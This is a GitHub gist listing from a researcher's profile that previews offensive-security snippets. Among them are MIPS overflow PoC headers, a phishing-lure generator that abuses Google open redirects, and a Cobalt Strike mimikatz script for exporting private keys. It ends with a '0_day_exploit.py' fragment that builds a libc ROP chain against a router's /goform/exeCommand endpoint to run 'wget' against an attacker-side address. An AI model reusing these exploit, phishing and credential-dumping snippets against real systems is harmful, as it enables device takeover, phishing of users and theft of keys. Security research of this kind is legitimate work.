Skip to content

Instantly share code, notes, and snippets.

View OlivierLaflamme's full-sized avatar
:shipit:
؁؁؁؁؁؁؁؁؁؁؁؁؁؁🏴 403 Forbidden؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁🚩؁؁؁؁؁؁؁؁؁

Boschko OlivierLaflamme

:shipit:
؁؁؁؁؁؁؁؁؁؁؁؁؁؁🏴 403 Forbidden؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁🚩؁؁؁؁؁؁؁؁؁
688 followers · 221 following
View GitHub Profile
@OlivierLaflamme
OlivierLaflamme / Overflow_POC_MIPS
Created January 26, 2023 20:39
from pwn import *
context(arch='mips', os='linux', log_level='debug')
file_name = './exp'
debug = 0
if debug:
r = remote()
else:
@OlivierLaflamme
OlivierLaflamme / mips_pwndbg.txt
Created January 23, 2023 14:48
stack based bod in mips
from pwn import *
context(arch= 'mips' , os= 'linux' , log_level= 'debug' )
file_name = './exp'
debug = 0
if debug:
r = remote()
else :
@OlivierLaflamme
OlivierLaflamme / start-mipsel.sh
Created January 19, 2023 23:55
setup for qemu
#set network
sudo brctl addbr virbr0
sudo ifconfig virbr0 192.168.5.1/24 up
sudo tunctl -t tap0
sudo ifconfig tap0 192.168.5.11/24 up
sudo brctl addif virbr0 tap0
qemu-system-mips -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mips_standard.qcow2 -append "root=/dev/sda1" -netdev tap,id=tapnet,ifname=tap0,script=no -device rtl8139,netdev=tapnet -nographic
@OlivierLaflamme
OlivierLaflamme / calls.cs
Last active April 26, 2023 04:16
C# code that sets up an x64 syscall stub as a byte array, allocate that stub into memory, replace the syscall ID with a user-defined one, create a delegate for the stub, and then execute the syscall
using System;
using System.Runtime.InteropServices;
namespace SyscallStub
{
// Define the syscall stub as a byte array
static readonly byte[] syscallStub = new byte[] {
0x48, 0x31, 0xc0, // xor rax, rax
0x48, 0xbb, 0x01, 0x00, 0x00, 0x00, 0x00, // mov rbx, user-defined syscall ID
0x0f, 0x05 // syscall
@OlivierLaflamme
OlivierLaflamme / google_lure.py
Created December 1, 2022 03:18 — forked from ustayready/google_lure.py
Generate phishing lures that exploit open-redirects from www.google.com using Google Docs
from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from apiclient import errors
import re
from bs4 import BeautifulSoup as Soup
@OlivierLaflamme
OlivierLaflamme / peuse_cpu_crash.py
Last active October 21, 2022 16:43
#!/usr/bin/env python3
"""
How to use:
Run this script out of /tmp in a seperate cmd (CMD-A)
leave this running CRTL+C if you want to kill it of `ps aux` find the PID the `kill -9 [PID]`
Step1: chmod +x peuse_cpu_crash.py
Step2: python3 peuse_cpu_crash.py
@OlivierLaflamme
OlivierLaflamme / shell.sh
Created October 9, 2022 18:13
#!/bin/bash
echo "Hello World"
@OlivierLaflamme
OlivierLaflamme / fuzzer.py
Created October 5, 2022 17:35
fuzzer
from boofuzz import *
IP = "192.168.0.5"
PORT = 80
def check_response(target, fuzz_data_logger, session, *args, **kwargs):
fuzz_data_logger.log_info("Checking test case response...")
try:
response = target.recv(512)
except:
@OlivierLaflamme
OlivierLaflamme / mmimikatz.cna
Created September 21, 2022 22:50 — forked from tothi/mmimikatz.cna
multi-command mimikatz functionality in a Cobalt Strike beacon
#
# multi-command mimikatz in a Cobalt Strike beacon extending the built-in mimikatz functionality
#
# cmd separator is |
#
# practical example: export machine certificates (including non-exportable private key :)):
#
# mmimikatz "crypto::capi|crypto::certificates /systemstore:local_machine /store:my /export"
#
@OlivierLaflamme
OlivierLaflamme / 0_day_exploit.py
Created September 10, 2022 00:53
url = "http://%s:80/goform/exeCommand"%(host)
libc=0x409a7000
godget1=0x00018298 #pop r3 pc
godget1 = struct.pack("< I",godget1+libc)
system=0x0005A270
system = struct.pack("< I", system+libc)
command="wget 192.168.174.136"
godget2 = 0x00040cb8 # mov r0 sp; blx r3
godget2 = struct.pack("< I", godget2 + libc)
password = "A" * 444+".gif"+godget1+system+godget2+command